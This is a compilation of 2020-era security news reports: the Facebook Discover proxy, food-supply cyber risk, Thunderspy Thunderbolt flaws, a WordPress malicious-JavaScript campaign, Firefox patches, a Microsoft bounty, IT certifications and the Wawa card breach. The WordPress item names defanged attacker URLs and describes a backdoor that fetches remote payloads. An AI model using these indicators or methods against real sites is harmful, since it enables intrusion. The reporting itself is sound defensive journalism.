Facebook Launches ‘Discover,’ A Secure Proxy to Browse the Internet for Free

Free Internet with Facebook Discover Proxy

More than six years after Facebook launched its ambitious Free Basics program to bring the Internet to the masses, the social network is back at it again with a new zero-rating initiative called Discover.

The service, available as a mobile web and Android app, allows users to browse the Internet using free daily data caps.

Facebook Discover is currently being tested in Peru in partnership with local telecom companies such as Bitel, Claro, Entel, and Movistar.

Unlike the regular rich-content browsing, Facebook’s latest connectivity project only provides low-bandwidth text-only based browsing, meaning other forms of data-intensive content such as audio and video are not supported.

Another key differentiator is that it treats all websites equally, whereas users of Free Basics are limited to a handful of sites that are submitted by developers and meet technical criteria set by Facebook.

The move, ultimately, drew criticism for violating principles of net neutrality, leading to its ban in India in 2016.

A Secure Web-Based Proxy

But how does Discover actually work? It’s a lot similar to Free Basics in that all traffic is routed through a proxy. As a result, the device only interacts with the proxy servers, which acts as a “client” to the website users have requested for.

This web-based proxy service runs within a whitelisted domain under “freebasics.com” that the operator makes the service available for free (e.g. “https://example.com” is rewritten as “https://https-example-com.0.freebasics.com”), which then fetches the webpages on behalf of the user and deliver them to their device.

Free Internet with Facebook Discover Proxy

“There is extensive server-side logic in place to make sure links and hrefs are correctly transformed,” the company said. “This same logic helps ensure that even HTTP-only sites are delivered securely over HTTPS on Free Basics between the client and the proxy.”

In addition, the cookies used by the websites are stored in an encrypted fashion on the server to prevent mobile browsers from hitting cookie storage limits. The encryption key (called internet cookie key or “ick”) is stored on the client so that the contents of the key cannot be read without knowing the user’s key.

“When the client provides the ick, it is forgotten by the server in each request without ever being logged,” Facebook noted.

But allowing JavaScript content from third-party websites also opens up avenues for attackers to inject malicious code, and worse, even lead to session fixation.

To mitigate this attack, Facebook Discover makes use of an authentication tag (called “ickt”) that’s derived from the encryption key and a second browser identifier cookie (named “datr”), which is stored on the client.

Free Internet with Facebook Discover Proxy

The tag, which is embedded in every proxy response, is then compared with the ‘ickt’ on the client-side to check for any signs of tampering. If there’s a mismatch, the cookies are deleted. It also makes use of a “two-frame solution” that embeds the third-party site within an iframe that’s secured by an outer frame, which makes use of the aforementioned tag to ensure the integrity of the content.

But for websites that disable the loading of the page in a frame to counter clickjacking attacks, Discover works by removing that header from the HTTP response, but not before validating the inner frame.

Furthermore, to prevent impersonation of the Discover domain by phishing sites, the service blocks navigation attempts to such links by sandboxing the iframe, thus preventing it from executing untrusted code.

“This architecture has been through substantial internal and external security testing,” Facebook’s engineering team concluded. “We believe we have developed a design that is robust enough to resist the types of web application attacks we see in the wild and securely deliver the connectivity that is sustainable for mobile operators.”

Have something to say about this article? Comment below or share it with us on Facebook, Twitter or our LinkedIn Group.

via:  thehackernews

Save pagePDF pageEmail pagePrint page

Cybersecurity Threats to the Food Supply Chain

When Smithfield Foods closed its Sioux Falls pork processing plant – joining other meat and poultry closures from Tyson Foods, Cargill and JBS USA – headlines suggested that the country was ‘perilously close to the edge’ of food shortages. So, just how safe is the food supply?

The recent closures have been forced by the COVID-19 pandemic. This is likely to be a transient risk, but all modern plants face an ever-present consistent risk from cyber-attack. COVID-19 has merely focused minds on an under-considered risk: how safe is the food supply chain?

It’s a question that needs to be asked. Food supply is a fundamental pillar of ordered societies, and a catastrophic lack of food would rapidly lead to social disorder. This would likely be more rapid and severe in the western democracies that have not experienced serious food shortages for more than 70 years since the end of World War II.

Cyber risk and threat

There is no risk if there is no threat. The first question, then, is whether there is a cyber threat to food supply. Are cyber criminals likely to attack the food industry?

The answer is clearly ‘yes’; and there are at least three obvious channels: hacktivists, cyber-criminal gangs, and nation states. And a fourth, that needs to be mentioned: competitors. “Increased levels of espionage and sabotage from competitors will also heighten as organizations do battle for technological supremacy in this space,” warns Daniel Norman, research analyst with the Information Security Forum (ISF).


There is a growing social movement to use the re-emergence from the COVID lockdown as an opportunity to ‘reboot’ the way society operates. Environmental pollution has dropped rapidly, and nature has recovered from its effects quickly. Environmental activists are calling for governments to invest in green technology as a post-pandemic economic stimulus.

Where this does not happen, and where the old polluting industries revert to their traditional practices, activists are likely to ‘punish’ the worst offenders. This is likely to be two-pronged: environmentalists concerned about increasing pollution, and animal rights activists objecting to the return to mass animal slaughter.

This punishment may come in the form of large-scale DDoS attacks, or even direct attacks against individual plants.

Cyber-criminal gangs

Criminal gangs are driven by two related issues – opportunity and money. The pandemic will have focused attention on the food supply chain, and both issues are apparent. The pandemic will be followed by recession, which could potentially be followed by a deeper depression. Even in the best scenario, there will be many areas of society operating on drastically reduced incomes in the foreseeable future.

The threat is not new. Theft of food has always existed: those who have none are forced to steal from those who have plenty. In the distant past, this was small-scale – effectively petty theft. In the more recent past, criminal gangs have become involved in more large-scale theft from distribution (cargo theft) and warehouses.

This is continuing: recent data from Transported Asset Protection Association (TAPA) suggests that cargo theft has increased by 114% over the last 12 months. On May 3, 2020, FreightWaves reported, “Trucks carrying food and other essentials have been popular with thieves along Mexico’s highways in recent weeks. Cargo theft of trucks has increased 25% during the coronavirus pandemic period, according to a survey conducted by LoJack Mexico.”

Cybercrime, however, could take this to a new level. Entire shipments of food could be redirected and stolen. Entire food companies can be extorted for large sums of money. IT and OT networks can be compromised by ransomware, and the rapid spoilage of food in production would be an incentive to pay the ransom. With much of the food industry comprising small local businesses, it will often become a question of paying up or going under – and this equation will attract additional attackers.

Nation states

The importance of the food supply chain is not lost on the military. In 1812, when Napoleon invaded Russia, the Russian army withdrew but operated a scorched earth policy to deny food supplies to Napoleon’s army. Without supplies, Napoleon was forced to retreat from Moscow, which arguably and ultimately led to his downfall.

“It is a well-known fact,” comments the ISF’s Norman, “that during times of conflict, the party that can destroy the food supply chain will inevitably win. It is therefore conceivable that cyber-attacks from nation state-backed actors and terrorist groups will begin targeting organizations dependent on new technologies, disrupting global supply chains.”

Cyber brings the opportunity of large-scale adversarial interference in food supplies. In military terms this could be a precursor to kinetic warfare, but the cyber age has introduced a new style of cyberwar. The U.S. experienced it in 2016 with Russian interference in the presidential election. The purpose may not have been to directly influence the outcome of the election, but to demoralize the American population. With a demoralized population, a nation’s effectiveness on the world stage is inevitably weakened.

“One way to weaken your adversary is to cause internal conflict,” added IOActive’s Sheehy. “Well, you can survive about three minutes without air, three days without water, and about three weeks without food. People will riot very quickly if they cannot get food. Even in this relatively civilized COVID lockdown, the stresses on the food supply chain have caused very high tensions among people.”

Continued interruption to the food supply chain would inevitably demoralize the population. In extreme circumstances it would lead to rioting in the streets and food looting. The possibility of such a threat from an adversarial nation should not be ignored.

The security of the food supply chain

The food industry is no different to any other industry – it has undergone rapid evolution into the fourth industrial revolution. IT and OT are being converged, and OT uses the same ICS devices with the same vulnerabilities as other industries. The same priority of continued production over updating systems prevails, and continued use of Windows 98 is still found. But just as older, vulnerable systems continue to be used, the industry is adopting new and not yet battle-tested technology with advanced sensors, robotics, drones and autonomous vehicles.

“One of the trends we see broadly in the food industry,” comments Sheehy, “is a move towards more automation. Partly this is a response to the pandemic – robots won’t be sent home in any similar or repeated scenario. Labor is more of a business risk than robots. However, moving to more significant automation is going to change the risk profile in a way that a lot of organizations haven’t formerly had to manage – operational technology has not been considered a high-risk priority.”

It’s exacerbated, added Matt Rahman (IOActive’s COO), “by the structure of the industry. About 74% of food manufacturers have less than 20 employees. About 97% have fewer than 500 employees. They don’t have the staff nor expertise to properly manage their cyber security.”

It is also worth noting that the food supply chain is more complex than the supply chains for most industries. Elsewhere, the supply chain primarily comprises third-party suppliers, product or parts delivery, and the manufacturer. With food it is third party suppliers (normally farmers), product delivery, food processing (the manufacturer), and then a further complex distribution to groceries/supermarkets and/or consumer. Each stage of this chain can be threatened.

“Technology adoption has skyrocketed in virtually every segment of our agriculture sector including food production, processing, and distribution,” comments Parham Eftekhari, founder and chairman of the Institute for Critical Infrastructure Technology (ICIT), “and experts predict this trend to continue with robotics and self-driving freight carriers paving the way for an autonomous future. This creates significant opportunity for disruption to our supply chain and food safety concerns.”

He continued, “Today, we are already hearing stories of processing plants shutting down and the potential of food shortages. What if manufacturing and storage facilities of perishable food products have their cooling systems hacked during a time of a national food shortage? It would only take a handful of high-profile attacks to create panic among citizens that could lead to a rush on grocery stores and threaten an already fragile food supply.”

The food industry supply chain is vulnerable at every stage. “Farmers are using GPS technology and robotics to custom fertilize and plant their land to optimize yield,” said Eftekhari. What if these systems are hacked – without their knowledge – resulting in crops that underperform expectations across the nation.”

Norman added, “5G environments will enable precision agriculture and farming at the individual crop or livestock level but will use poorly secured IoT devices and drones to monitor soil fertilization, nitrogen levels, pest control, water and sunlight requirements. Automated robotic combine harvesters will operate on private 5G networks, with machine learning systems calculating and monitoring optimum conditions across larger and interconnected ecosystems. The danger of attacks on the integrity of information could significantly alter the production process.”

At a local level, this could be a punitive attack by a hacktivist group objecting to use of certain pesticides, or genetically modified crops in general. “The agricultural industry is one of the biggest contributors to greenhouse gas emissions in the world,” says Norman. “Extreme levels of methane, nitrous oxide output and water usage consistently make them a prime target for activism. With greater dependency on technology, hacktivists will turn their attention to disrupting the technology underpinning the supply chain.”

At a national level, as part of modern geopolitical disruption, the aim could be to reduce yields in complete crops – shortages in wheat, corn and soybean crops would be both economically and socially damaging.

Distribution, both from farmer to processor and from processor to distributor, has long been subject to cargo theft by criminals – and the cyber element is growing. “Criminals hack into distribution firms,” comments IOActive’s Rahman, “to learn about shipments, create false invoices, bills of lading and manifests to falsify delivery/collection times when they can simply pick up the stolen cargo.”

The food processing plant is the obvious primary target for cyber criminals, especially for extortion. Ransomware is already targeting manufacturing. “Today, we are hearing stories of processing plants shutting down and the potential of food shortages,” said Eftekhari. “What if manufacturing and storage facilities of perishable food products have their cooling systems hacked during a time of a national food shortage? It would only take a handful of high-profile attacks to create panic among citizens that could lead to a rush on grocery stores and threaten an already fragile food supply.”

Here the worst scenario might come from terrorist groups rather than nation-states or criminal gangs. The motivation would be to seek harm rather than sow discord or acquire money. Such groups would be worried about neither attribution nor retribution, but could seek to break into processing plants either to damage equipment or poison supplies.

Beyond the processing plant, the food supply chain continues to the sales outlets. For now, the threat is physical redirection or old-fashioned cargo theft. This will change in future years as more and more supplies are delivered by autonomous trucks. Autonomous vehicles are proven to be hackable. Experts expect the recent trend of the food industry adopting new technology to continue, warns Eftekhari, “with robotics and self-driving freight carriers paving the way for an autonomous future. This creates significant opportunity for disruption to our supply chain and food safety concerns.”

But the threat already exists with current connected trucks. “The heavy vehicle cabs are exposed to potential cyber-attack,” warns Sheehy, “as well as their refrigerated trailers. The more modern refrigerated trailers often have their own monitoring systems which can be remotely accessible over mobile networks. They are also often attached to the controller area network (CAN bus) of the vehicle, providing a potential attack point to compromise the overall security of the vehicle.”

The COVID-19 pandemic has highlighted the fragility of the global food chain. This fragility will not be lost on cyber criminals. As the world moves from pandemic lockdown to economic recession, criminals will almost certainly look closely at the food supply chain as a means of making money. The risk is not to any one specific part of the chain nor any one type of criminal – the whole chain is at risk.

“If an attacker wants to provide some type of disruption to the food supply, one area could be transportation; a second is in food processing; but a third would be in food safety,” says Sheehy. “If the cold storage facility is not kept at the appropriate temperature, products will spoil. Even though different parts of the supply chain may have successfully done the production, the transportation and processing securely, you may still be in a situation where you have a constraint on supply due to a compromise in the integrity of the safety processes.”

via:  securityweek

Save pagePDF pageEmail pagePrint page

Cynet Offers IR Specialists Grants up to $1500 for each IR Engagement

In the past, the autonomous breach protection company Cynet announced that it is making Cynet 360 threat detection and response platform available at no charge for IR (incident response) service providers and consultants.

Today Cynet takes another step and announces a $500 grant for Incident Responders for each IR engagement in which Cynet 360 was used, with an additional $1,000 grant if the customer if the customer purchases an annual Cynet 360 subscription after the IR process is concluded.
Learn about this new offering here.

Incident response investigations come in a thousand different variations, but most can be broken down into two main parts. The first is discovering the few suspicious machines, user accounts, and network connections out of the mass activities within the attacked environment.

The second part follows these discoveries and involves a surgical-like collection and analysis of forensic artifacts to refute or validate the suspicion and if validated to disclose the full attack root cause and impact.

While IR pros have a wide array of commonly used open-source tools to perform a deep dive forensic investigation on a single or few suspicious machines, there is a crying shortage of available tools for the first part.

That’s mainly because to find the proverbial compromised needle in a haystack of a mostly non-compromised environment, one must have complete visibility into the entire process execution network traffic and user activity.

This is where Cynet 360 comes in. With an enterprise-grade distribution infrastructure providing seamless deployment across thousands of endpoints in minutes, Cynet 360 empowers responders to effortlessly gain the required visibility into the initial part of the investigation, easily pinpointing the entities that should be further investigated.

Cynet 360 provides incident responders with the following capabilities that cover both the investigation and the remediation parts of the response process.

Full Environment Visibility
  • Gain instant visibility into any host, files, process, Logs, network traffic, and user activities.
  • Get a verdict, attack scope, and all indicators immediately.
  • Use Cynet’s central management to distribute other open source IR tools across the environment.
Precise Threat Knowledge
  • Get real-time, accurate threat knowledge auto-generated by the Cynet 360 correlation engine.
  • For deep-dive investigations, leverage granular forensic tools to conduct an end-to-end investigation to determine the attack’s scope and impact.
  • Trust your own skills – Proactively hunt
Complete Recovery Actions
  • Isolate infected hosts, disable compromised user accounts, remove malicious files, and block risky network connections.
  • Craft your own remediation policies for automated threat block and removal.

Learn more about this new offering for incident responders here.

via:  thehackernews

Save pagePDF pageEmail pagePrint page

7 New Flaws Affect All Thunderbolt-equipped Computers Sold in the Last 9 Years

A cybersecurity researcher today uncovers a set of 7 new unpatchable hardware vulnerabilities that affect all desktops and laptops sold in the past 9 years with Thunderbolt, or Thunderbolt-compatible USB-C ports.

Collectively dubbed ‘ThunderSpy,’ the vulnerabilities can be exploited in 9 realistic evil-maid attack scenarios, primarily to steal data or read/write all of the system memory of a locked or sleeping computer—even when drives are protected with full disk encryption.

In a nutshell, if you think someone with a few minutes of physical access to your computer—regardless of the location—can cause any form of significant harm to you, you’re at risk for an evil maid attack.

According to Björn Ruytenberg of the Eindhoven University of Technology, the ThunderSpy attack “may require opening a target laptop’s case with a screwdriver, [but] it leaves no trace of intrusion and can be pulled off in just a few minutes.”

In other words, the flaw is not linked to the network activity or any related component, and thus can’t be exploited remotely.

“Thunderspy works even if you follow best security practices by locking or suspending your computer when leaving briefly, and if your system administrator has set up the device with Secure Boot, strong BIOS and operating system account passwords, and enabled full disk encryption,” the researcher said.

Besides any computer running Windows or Linux operating systems, Thunderbolt-powered Apple MacBooks, except retina versions, sold since 2011 are also vulnerable to Thunderspy attack, but partially.

ThunderSpy Vulnerabilities

The following list of seven Thunderspy vulnerabilities affects Thunderbolt versions 1, 2 and 3, and can be exploited to create arbitrary Thunderbolt device identities, clone user-authorized Thunderbolt devices, and finally, obtain PCIe connectivity to perform DMA attacks.

  1. Inadequate firmware verification schemes
  2. Weak device authentication scheme
  3. Use of unauthenticated device metadata
  4. Downgrade attack using backward compatibility
  5. Use of unauthenticated controller configurations
  6. SPI flash interface deficiencies
  7. No Thunderbolt security on Boot Camp

For those unaware, Direct memory access (DMA) attacks against the Thunderbolt port is not new and has previously been demonstrated with ThunderClap attacks.

DMA-based attacks let attackers compromise targeted computers in a matter of seconds just by plugging a malicious hot-plug devices—such as an external network card, mouse, keyboard, printer, or storage—into Thunderbolt port or the latest USB-C port.

In brief, DMA attacks are possible because Thunderbolt port works at a very low-level and with high privileged access to the computer, allowing connected peripherals to bypass operating system security policies and directly read/write system memory, which may contain sensitive information including your passwords, banking logins, private files, and browser activity.

thunderbolt intel hacking

To prevent DMA attacks, Intel introduced some countermeasures, and one of them was ‘security levels’ that prevents unauthorized Thunderbolt PCIe-based devices from connecting without user authorization.

“To further strengthen device authentication, the system is said to provide ‘cryptographic authentication of connections’ to prevent devices from spoofing user-authorized devices,” the researcher said.

However, by combining the first three Thunderspy flaws, an attacker can break the ‘security levels’ feature, and load an unauthorized malicious Thunderbolt device by forging Thunderbolt device identities, as shown in a video demonstration shared by Ruytenberg.

“Thunderbolt controllers store device metadata in a firmware section referred to as Device ROM (DROM). We have found that the DROM is not cryptographically verified. Following from the first issue, this vulnerability enables constructing forged Thunderbolt device identities,” he added.

“In addition, when combined with the second issue, forged identities may partially or fully comprise arbitrary data.”

“In addition, we show unauthenticated overriding of Security Level configurations, including the ability to disable Thunderbolt security entirely, and restoring Thunderbolt connectivity if the system is restricted to exclusively passing through USB and/or DisplayPort,” he added.

“We conclude this report by demonstrating the ability to permanently disable Thunderbolt security and block all future firmware updates.”

According to Ruytenberg, some latest systems available in market since 2019 include Kernel DMA protection that partially mitigates Thunderspy vulnerabilities.

To know if your system is affected by Thunderspy vulnerabilities, Ruytenberg has also released a free and open-source tool, called Spycheck.

Interestingly, when the researcher reported Thunderspy vulnerabilities to Intel, the chip company revealed it had already been aware of some of them—with no plans to patch or disclose it to the public.

Ruytenberg claims to have found more potential vulnerabilities in Thunderbolt protocol, which is currently are part of an ongoing researcher and expected to be revealed soon as ‘Thunderspy 2.’

In conclusion, if you consider yourself a potential target to evil-maid attacks and carrying a Thunderbolt system with you, always avoid leaving your devices unattended or power off the system completely, or at least consider using hibernation instead of sleep mode.

Besides this, if you want to be more paranoid, avoid leaving your Thunderbolt peripherals unattended or lending them to anybody.

via:  thehackernews

Save pagePDF pageEmail pagePrint page

Google Authenticator Users Can Now Transfer 2SV Secrets Between Devices

Google announced that Google Authenticator users can now transfer 2-Step Verification (2SV) secrets between devices.

The new feature is meant to make it easier for users to manage their Google Authenticator 2SV codes across multiple devices.

The 2SV secrets represent the data that is used to generate 2SV codes across devices that have Google Authenticator installed. With the new feature, users can transfer the data to a new device when upgrading, Google says.

The much anticipated feature is now available in the latest version of Google Authenticator on Android (version 5.10), the Internet company announced.

“Using 2SV, 2-Factor Authentication (2FA) or Multi-Factor Authentication (MFA) is critical to protecting your accounts from unauthorized access. With these mechanisms, users verify their identity through their password and an additional proof of identity, such as a security key or a passcode,” Google said.

Google Authenticator aims not only to provide an easy way to use 2SV on accounts, but also to improve the security of the login process, compared to options such as receiving passcodes via text messages.

To ensure that users can keep their accounts safe, Google also took a series of measures to minimize the attack surface in spite of the newly announced feature.

Thus, no data is sent to Google’s servers when the user transfers 2SV secrets, as the communication takes place between the two devices only.

“Your 2SV secrets can’t be accessed without having physical access to your phone and the ability to unlock it,” the Internet giant notes.

Furthermore, alerting mechanisms and in-app logs were implemented, so as to make users fully aware of the fact that the transfer function has been used.

via:  securityweek

Save pagePDF pageEmail pagePrint page

Nearly 1 Million WordPress Sites Targeted via Old Vulnerabilities

A large-scale attack campaign has targeted over 900,000 WordPress websites through vulnerabilities in plugins and themes, WordPress security company Defiant revealed this week.

The attacks were initially discovered on April 28, but showed a massive spike on May 3, when more than half a million websites were hit. Likely the work of a single threat actor, the campaign is aimed at injecting the target websites with malicious JavaScript designed to redirect visitors to malvertising sites.

Responsible for only a small volume of attacks in the past, the threat actor has ramped up the operation, with over 20 million attacks registered on May 3. The researchers discovered that, over the past month, over 24,000 distinct IP addresses were used to attack more than 900,000 sites.

“Due to the sheer volume and variety of attacks and sites that we’ve seen targeted, it is possible that your site may be exposed to these attacks, and the malicious actor will likely pivot to other vulnerabilities in the future,” Defiant says.

The targeted vulnerabilities are not new and have been abused in previous attacks as well. These include Cross-Site Scripting (XSS) vulnerabilities in the Easy2Map plugin (removed from the WordPress repository in August 2019), Blog Designer (patched in 2019), and Newspaper theme (patched in 2016), and options update bugs in WP GDPR Compliance (patched in late 2018), and Total Donations (removed in early 2019).

“Although it is not readily apparent why these vulnerabilities were targeted, this is a large scale campaign that could easily pivot to other targets,” Defiant says.

The JavaScript code the attackers attempt to insert into the targeted websites is located at count[.]trackstatisticsss[.]com/stm and also checks whether the victim has any WordPress login cookies set. The attackers hope that the script would be executed in an administrator’s browser.

Admins who are not logged in and are not on the login page are redirected to a malvertising site. Otherwise, the script attempts to inject a malicious PHP backdoor into the current theme’s header, along with a second malicious JavaScript.

The backdoor downloads another payload from https://stat[.]trackstatisticsss[.]com/n.txt and attempts to execute it by including it in the theme header.

“This method would allow the attacker to maintain control of the site, as they could simply change the contents of the file at https://stat[.]trackstatisticsss[.]com/n.txt to code of their choice which could be used to embed a webshell, create a malicious administrator, or even delete the entire contents of the site,” Defiant says.

The final payload used in this attack was designed to prepend a variant of the initial script to every JavaScript file on the site, as well as to all .htm, .html, and .php files named “index.” It also rechecks the infected site every 6,400 seconds and re-infects it if necessary.

Site owners are advised to keep all of their plugins updated and to deactivate and delete those plugins that have been removed from the WordPress plugin repository, to ensure their websites are protected.

via: securityweek

Save pagePDF pageEmail pagePrint page

Firefox 76 Brings Security Patches, Breached Password Alerts

Mozilla this week released Firefox 76 to the stable channel with an updated password manager, alerts for breached passwords, and patches for 11 vulnerabilities.

Starting with the new release, the browser aims to help users better keep their accounts secure and easily generate strong passwords, courtesy of the new Firefox Lockwise password manager.

On shared devices, the feature keeps passwords secure by prompting users for their account password before making saved logins available to them. Furthermore, the credentials are made available for five minutes only, Mozilla says.

The Lockwise dashboard, the browser maker explains, is powered by Firefox Monitor, which alerts users when their credentials were part of a data breach.

Firefox alerts users when one of the passwords they use is identical with a password that has been compromised, but also when the username and password were part of a breach (additional details about the breach are also included).

“Don’t worry, Firefox doesn’t know your actual passwords. This new feature automatically checks your encrypted list of passwords against the breached website information, helping you to stay on top of your online accounts that may have been compromised,” Mozilla explains.

The organization also points out that users can now leverage Firefox Lockwise to generate passwords of a minimum of 12 random letters, numbers and symbols.

Furthermore, Mozilla has made Firefox Lockwise available for iOS and Android as well, allowing users to access their passwords while on the go and easily sync their logins.

Firefox 76 also arrived with patches for 11 vulnerabilities, including three assessed with a critical severity rating.

The first of the critical bugs is a use-after-free during worker shutdown (CVE-2020-12387), which could lead to an exploitable crash, the second is a sandbox escape (CVE-2020-12388) that impacts Windows only, while the third (CVE-2020-12395) refers to memory safety bugs in both Firefox 75 and Firefox ESR 68.7.

The new browser release also patches three high severity issues (CVE-2020-12389 – sandbox escape; CVE-2020-6831 – buffer overflow; and CVE-2020-12396 – memory safety bugs), four moderate risk bugs (CVE-2020-12390 – incorrect serialization; CVE-2020-12391 – Content-Security-Policy bypass; CVE-2020-12392 – arbitrary local file access; CVE-2020-12393 – potential command injection), and one low severity issue (CVE-2020-12394 – URL spoofing in location bar when unfocussed).

This week, Google too released an update for its Chrome browser, to address a total of three vulnerabilities, including two reported by external researchers. Both of these bugs are high severity issues: CVE-2020-6831 – a stack buffer overflow in SCTP, and CVE-2020-6464 – type confusion in Blink.

via:  securityweek

Save pagePDF pageEmail pagePrint page

Microsoft Offering Up to $100,000 for Vulnerabilities in Azure Sphere

Microsoft announced a new security research challenge that encourages white hat hackers to find and responsibly disclose vulnerabilities in the company’s Azure Sphere solution.

Azure Sphere is an IoT security solution designed to provide end-to-end security across hardware, operating system and the cloud.

In an effort to identify potentially serious vulnerabilities in Azure Sphere, Microsoft has decided to run a three-month application-only challenge.

Hackers can apply for the Azure Sphere Research Challenge until May 15, and the challenge will run between June 1 and August 31. Researchers whose applications have been accepted will receive an email from Microsoft.

This new initiative, an expansion of the Azure Security Lab project announced last year, invites researchers to find vulnerabilities that would allow them to execute code on the Pluton security subsystem, which is the hardware-based secured root of trust for Azure Sphere, or in the Secure World operating environment of the Azure Sphere application platform. Microsoft is prepared to pay out up to $100,000 for these types of exploits.

While this research focuses on the Azure Sphere OS, vulnerabilities in other components could still receive a reward through the public Azure bug bounty program.

For the Azure Sphere Research Challenge, Microsoft has teamed up with several cybersecurity solutions providers, including Avira, Baidu, Bitdefender, Bugcrowd, Cisco, ESET, FireEye, F-Secure, HackerOne, K7 Computing, McAfee, Palo Alto Networks and Zscaler.

“While Azure Sphere implements security upfront and by default, Microsoft recognizes security is not a one-and-done event. Risks need to be mitigated consistently over the lifetime of a constantly growing array of devices and services. Engaging the security research community to research for high-impact vulnerabilities before the bad guys do is part of the holistic approach Azure Sphere is taking to minimize the risk,” Microsoft said.

via:  securityweek

Save pagePDF pageEmail pagePrint page

Top IT Certifications for 2020

Whether you’re new to the IT field or deep in the technology trenches, knowing what is hot and, sometimes more importantly, what is not, can be critical to the next step in your career path. That’s why we’ve got you covered with the latest and greatest certifications that should be on your radar, based on sales trends and unshakeable predictions from a team of experts. So, let’s dive in on what you should be looking to get certified in for 2020!

10. CompTIA Linux+ (XK0-004)

What is new is old again! With the resurgence of Linux distros in the security and cloud realms, it is little surprise that brushing up on your bash scripting and command-line troubleshooting is what employers want to see these days. CompTIA released a new version of their Linux+ certification in October, streamlining their previous two exams into one and adding in security ninja skills to XK0-004.

9. Microsoft MCSA SQL Development (70-76x)

Cloud databases may be all of the rage, but the basics are still in style. The staying power of Microsoft MCSA SQL Development (70-76x) is a strong testament to that. for database admins and developers is a strong testament to that. We predict that business intelligence solutions around Azure will grow to eventually replace this certification, but not anytime soon. Whether on-premises or in the cloud, this certification hasn’t lost its shine within the database market.

8. (ISC)2 CISSP (CAT, April 2018)

Despite interest in other specializations like CCSP and CSSLP, the CISSP continues to be the top dog in the security industry. Although slipping in this list compared to other IT certifications, CISSP remains a gold standard that any IT professional, especially in a management role, should consider. These initials are not disappearing from the thousands on LinkedIn anytime soon!

7. Cisco CCNA (200-301)

Although well-known in networking circles, the CCNA has remained the same certification program for many years now. But in the Summer of 2019, all of that changed with a new blueprint emphasizing cloud-based automation. You’ve got until February to test on the old CCNA exam objectives, but stay tuned for a huge update that will be sending network engineers scrambling to update their skills and prove their mettle in 2020!

6. Oracle 12c SQL OCA (1Z0-071)

From self-healing databases and automated cloud AI, the Oracle database has many bells and whistles and still remains a popular choice for large, multinational enterprises. Not without its controversial claims, there is no doubt it is a titan in the database realm, and skilled administrators are in high demand. This is one of the first exams needed to certify as an Oracle Certified Associate (OCA). We saw this title jump into the top ten last year and believe it is a trend we’ll continue to see in 2020.

5. Network+ (N10-007)

This may seem like a head-scratcher, but it is clearly based on our 2019 numbers that more newbies are willing to learn the dark arts of networking. Some of these can be explained away by the huge IoT demand and the growing needs to better support the infrastructure for these devices. As we become more connected, we’ll need to grow the workforce to ensure those connections stay reliable and secure. Also as part of what many consider a core understanding of cybersecurity starting in A+, Network+, and Security+, it is a great start to whatever branch of cybersecurity you are interested in. With that in mind, it’s good to see some growth in this introductory networking certification.

4. EC-Council CEH (v10)

Certified Ethical Hacker is still the ultimate in red team certification, enticing many a hacker into the cameras-lights-action of penetration testing. This is a great, high-level introductory look into the world of a white hat hacker, as it covers ethics, reporting, and a general review of the types of tools used. Though we predict that this certification will continue to grow in 2020, expect blue team related certifications like Certified Network Defender (CND) to rise as more organizations focus on automated protection and scanning over manual exploitation.

3. CompTIA Security+ (SY0-501)

As the IT skills gap, especially in the security space, continues to exist, more individuals will be gravitating to the field with little or no knowledge. Vendor-neutral certifications targeted at the entry-level, specifically well-known ones like Security+, will continue their popularity, as it is again part of the core understanding, of getting a high-level look through the field of cybersecurity. Now this certification has dropped a couple of spots since last year, mainly because more IT professionals are honing their existing skills or dipping their toes into more specialized security professions. If 2019 was the year of security, expect 2020 to re-emphasize traditional IT roles.

2. Microsoft MCSA Windows Server (70-74x)

This certification is also showing some age, but Windows system admins are still needed even in the age of Azure. So it is no surprise that this certification continues to be popular. We expect continued popularity in 2020, but we’re also watching the trend of companies moving toward machine learning to maintain their virtualized networking solutions. Although not as many companies adopted machine learning in 2019 as expected and it is not likely increase significantly in 2020. it is a long-term trend that we’re keeping our eyes on.

1. CompTIA A+ (220-100x)

The future in IT has never been greater with more advanced devices requiring more skilled technicians to manage them. The new 2019 exam emphasizes the newest technologies found in the field, making it a must for a full-fledged hardware technician, or anyone looking to hone their tech support skills. We expect to see this certification’s popularity only grow in 2020.

Honorable Mentions

CCNA CyberOps

This was a new Cisco specialization in 2018, but we’re finally seeing some growth here. Keep your eye on this space.



This agile project management certification is one of PMI’s fastest growing, but it’s still not as popular as other project management certs. In 2020, this certification will remain a force to be reckoned with, even as the field of agile certification continues to widen.


Microsoft MCSA Azure

The slew of new Azure certifications, hot on the heels of the huge moves from various enterprises, including the DoD, ensure this certification will only grow in 2020. By adding performance-based labs to these exams, expect to see more and more cloud admins/developers jump on the bandwagon.



Slow to catch on until late last year, this certification is now growing steadily. We have every reason to expect its popularity among candidates will only grow in 2020. This certification hits right below the CASP and above the Security+ as an interesting intersection between a security auditor and analyst.


via:  kaplanittraining

Save pagePDF pageEmail pagePrint page

Wawa Breach: Hackers Put 30 Million Stolen Payment Card Details for Sale

Remember the recent payment card breach at Wawa convenience stores?

If you’re among those millions of customers who shopped at any of 850 Wawa stores last year but haven’t yet hotlisted your cards, it’s high time to take immediate action.

That’s because hackers have finally put up payment card details of more than 30 million Wawa breach victims on sale at Joker’s Stash, one of the largest dark web marketplaces where cybercriminals buy and sell stolen payment card data.

As The Hacker News reported last month, on 10th December Wawa learned that its point-of-sale servers had malware installed since March 2019, which stole payment details of its customers from potentially all Wawa locations.

At that time, the company said it’s not aware of how many customers may have been affected in the nine-month-long breach or of any unauthorized use of payment card information as a result of the incident.

Now it turns out that the Wawa breach marked itself in the list of largest credit card breaches ever happened in the history of the United States, potentially exposing 30 million sets of payment records.

wawa credit card data breach

According to threat intelligence firm Gemini Advisory, on 27th January 2020, hackers started uploading stolen payment card data from Wawa at Joker’s Stash marketplace, titled as ‘BIGBADABOOM-III,’ which reportedly includes card numbers, expiration dates, and cardholder names.

“While the majority of those records were from US banks and were linked to US-based cardholders, some records also linked to cardholders from Latin America, Europe, and several Asian countries,”  Gemini Advisory said.

“Non-US-based cardholders likely fell victim to this breach when traveling to the United States and transacting with Wawa gas stations during the period of exposure.”

“The median price of US-issued records from this breach is currently $17, with some of the international records priced as high as $210 per card.”

In the latest statement released yesterday, Wawa confirmed that the company is aware of reports of criminal attempts to sell customers’ payment card data and to help further protect its customers, the company has ‘alerted payment card processors, payment card brands and card issuers to heighten fraud monitoring activities.’

“We continue to encourage our customers to remain vigilant in reviewing charges on their payment card statements and to promptly report any unauthorized use to the bank or financial institution that issued their payment card by calling the number on the back of the card,” Wawa said.

Customers who bought anything from any of the Wawa convenience stores between March and December last year are advised to block the affected cards and request a new one from your respective financial institution.

